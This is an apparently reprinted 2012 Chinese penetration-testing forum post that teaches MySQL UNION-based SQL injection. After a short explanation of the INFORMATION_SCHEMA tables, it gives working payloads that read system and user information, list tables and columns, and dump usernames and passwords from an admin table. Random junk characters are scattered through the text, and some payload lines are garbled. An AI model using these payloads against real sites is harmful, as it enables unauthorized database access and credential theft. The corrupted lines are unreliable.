中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法# s: L" x; I/ p

+ A; a8 b$ U+ ?2 a& L4 J. }) m; i学习盲注前先了解下 IFORMATION_SCHEMA 库
! [6 M$ a& w9 E* v# @: `" O7 o& {% W7 j  v' W/ D- x
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
. z; _4 t. U# ]5 l$ l4 n! u" K5 L0 y0 S存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
: V7 g7 X9 B* `% i, F8 ~; I1.得到所有数据库名:/ E5 h2 b( N9 O( ~
|SCHEMATA ->存储数据库名的表7 T3 v6 E* C) Z2 l( y
|---字段:SCHEMA_NAME ->数据库名称
- F( k- p8 |1 A! x9 ^( Y: R" W  N2 @6 l* j
|TABLES ->存储表名
7 W2 Y8 E6 I& m8 N: m|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
* E6 L' @# o. |- Y! @0 A! O$ {  V|---字段:TABLE_NAME ->存储表的表名
. G% }  `# w% G8 k" o/ M& \* v" k2 L
|COLUMNS ->存储的字段名表8 H9 M+ t9 J0 f5 o) p0 A& N% R
|---字段:TABLE_SCHEMA ->该字段所属数据库名
  y/ C5 q5 k" f- J3 P|---字段:TABLE_NAME ->存储所属表的名称* R$ r2 T) X7 P1 q' E
- m: A3 K; W6 C$ U! e& S
|---字段:COLUMN_NAME ->该字段的名称
5 |/ B% E' O8 ^5 U, H
/ q) n8 {1 \0 W. C  B
# j5 z7 t2 L4 ~* _! w6 f) [
, ^4 |2 J0 M# a( g5 b###########################################################################/ A$ {- A/ Q; V& z) ~5 K: I
: y+ t4 r4 d- C, V, q3 T* S. {" }
0x001 获取系统信息:
' K  e  `1 B6 H0 N% y8 m7 z3 N+ {7 z+ o
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
& [2 I7 Y5 W5 {* l* C
) p+ S+ j* j3 I8 K. Y7 Q  r# T/*
" ?5 ~/ n* ~/ F
. m. T4 C9 L& G% j& H. l6 W& l6 ]@@global.version_compile_os 获取系统版本
; R6 F/ h- G" Z6 D4 Y3 }4 {0 o3 i# L" o4 G: A
@@datadir 数据库路径
% C& Z' K9 `: xdatabase() 当前数据库名称$ G+ T0 T# {& s% Q5 D, `% ?
0x3c62723e 换行HEX值+ m4 e. V6 |" E3 H

, }" U1 y3 Q& A) R6 f*/" P' W5 f% Q6 _! l* N7 _$ E
9 n% A$ V; Q4 N
5 _6 @6 Q2 i( @+ l# j/ {0 S- ^9 I% q
% z: [5 w: Q3 D- l( R$ ]
######################################################################
2 v# Q; F8 K# w+ ~0 ~: ]* S8 \7 k5 F2 J9 P$ [4 [: G& K. @
0x002 获取表名3 n" `& ]" b& y& Z5 h8 u0 {9 G2 Y
% z; b1 b5 d6 A2 J1 t1 Y
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*" K" N1 [7 @5 }6 X6 n
/ h4 I2 c5 q- ]. z2 W4 s# A! ?! y
  e3 Y/ e  b. p( y1 q+ V4 Z" f

2 r$ F% }- B, B' x9 o$ N+ ^/*
# r5 y! Z/ P, P; j! Y2 @$ S/ W$ @. Q+ [- p; ]* J
0x67617264656e 为当前数据库名
' H8 u/ }$ d. l0 E1 h: s4 I) w2 R7 x8 {. x
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名1 ^9 m& A, k$ {! [$ ]1 J
% c  S. F' b( u7 ?, }( R) B
*/0 V6 L- S7 x  ]2 w& Y5 F# C
6 Z, i$ J  c" X, J9 n# e' l' H" h
######################################################################
' n5 j/ _- K, _* }
' r/ b/ ~4 {* J2 A1 V) L4 b, |; W / u1 A5 L1 ^8 o& S
/ C  y) q( m6 L- R
0x003 获取字段, Y9 H' k$ H$ \/ b  Y
/ h( H# [- B) W# Z
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
- h8 J* q* a/ V5 c7 M
% R" a! T$ I& `& h/ t/*
$ O: ?- W) t1 p
; |7 K% s9 X1 p. V! m, V' a6 Lgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段; J0 b1 S5 X! d
0 r( ]7 F$ z' }8 S, g
0x61646d696e ->选择一个表' ^2 m+ C3 h3 ~1 K/ E- L+ g

$ C( }2 U  ^' [! x5 Q2 Q/ ~0x67617264656e ->数据库名3 G- Q- S9 p/ r7 I9 K5 F% S. K* A" ~

8 X9 v. L) G3 |, F0 j$ U*/* `) K9 U/ ]1 v( m# k/ r

) r5 \& w$ x2 o, o' C2 ~& R#####################################################################
) c: W2 D6 {- z: o* L3 q& d1 j' ~# L- G; C8 I4 x' K

' ^( B# m! x7 i+ S2 l2 I% m' h/ v2 |" }; d8 k, h
0x004 获取数据
5 m( O" n( |6 j! {3 H6 G( g0 A: q& z5 r0 s$ ~
union select 1,2,34 g5 k8 a9 m: Y/ L$ Z
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin# k9 ?& j6 {- W

, U, d/ q% k" m3 [# Z  funion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
1 a9 i, n+ B* ^$ u: |
' Q' a" i$ e7 V, k% ?9 b6 f+ P / I' `2 @5 g2 ^, L( J/ _

3 [& L' P% X9 `; ?2 C/*6 I5 p" A: X1 P2 `/ T$ Z

. d: f% Z! e9 t# ^; M0x3c62723e 换行符号HEX编码4 {4 C! P3 j- c2 a! R  M

. }, z8 K& g6 m% y) v" ?2 F* Y$ sgroup_concat 同时获得该字段所有数据/ X4 [/ Q/ m- x& X* t
  z) M* ?; z9 K# N  S& W8 R
*/8 m) r. H; K' N" p( z. v
! t9 T. ~. ~& O0 v1 ^' q, ~8 P7 u: J





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2